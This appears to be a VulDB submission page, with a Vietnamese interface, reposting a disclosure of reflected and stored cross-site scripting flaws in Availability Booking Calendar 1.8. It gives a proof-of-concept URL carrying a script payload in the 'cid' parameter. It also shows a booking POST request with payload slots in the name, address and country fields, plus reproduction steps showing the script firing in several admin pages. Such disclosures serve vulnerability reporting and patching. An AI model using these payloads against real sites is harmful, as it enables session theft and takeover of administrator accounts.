Gửi #175746: Availability Booking Calendar 1.8 - Reflected XSS - Stored XSSthông tin

tiêu đềAvailability Booking Calendar 1.8 - Reflected XSS - Stored XSS
Mô tảAuthor : skalvin aka (CraCkEr) Date : 29/06/2023 Website : https://gzscripts.com/availability-booking-calendar-php.html Vendor : GZ Scripts Software : Availability Booking Calendar 1.8 Vuln Type: Reflected XSS - Stored XSS Impact : Manipulate the content of the site Release Notes: Reflected XSS The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Stored XSS Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. Path: /load.php GET 'cid' parameter is vulnerable to RXSS https://website/load.php?controller=GzFront&action=calendar&cid=1vqvby%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg6vt7wmumdm&view_month=1&cal_id=1&month=7&year=2023 ## Stored XSS ----------------------------------------------- POST /AvailabilityBookingCalendarPHP/load.php?controller=GzFront&action=checkout&cid=1 HTTP/1.1 date_range=03.07.2023+-+04.07.2023&abadults=&abchildren=&adults=1&children=1&promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=000&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=yyy&state=sss&zip=00000&country=LEB&terms=1&start_date=1688342400&end_date=1688428800&cal_id=1&calendar_id=1&from_date=1688342400&to_date=1688428800&payment_method=pay_arrival&create_booking=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any Day Colored by Green on the Calendar 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Address Line 1" 5. Inject your [XSS Payload] in "Country" 6. Accept with terms & Press [Booking] XSS Fired on Local User Browser 7. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 8. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done
Người dùng
 skalvin (UID 49463)
Đệ trình29/06/2023 11:16 (cách đây 3 những năm)
Kiểm duyệt07/07/2023 14:13 (8 days later)
Trạng tháiđược chấp nhận
Mục VulDB233295 [GZ Scripts Availability Booking Calendar PHP 1.8 HTTP POST Request load.php cid/first_name/second_name/address_1/country Tập lệnh chéo trang]
điểm17

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!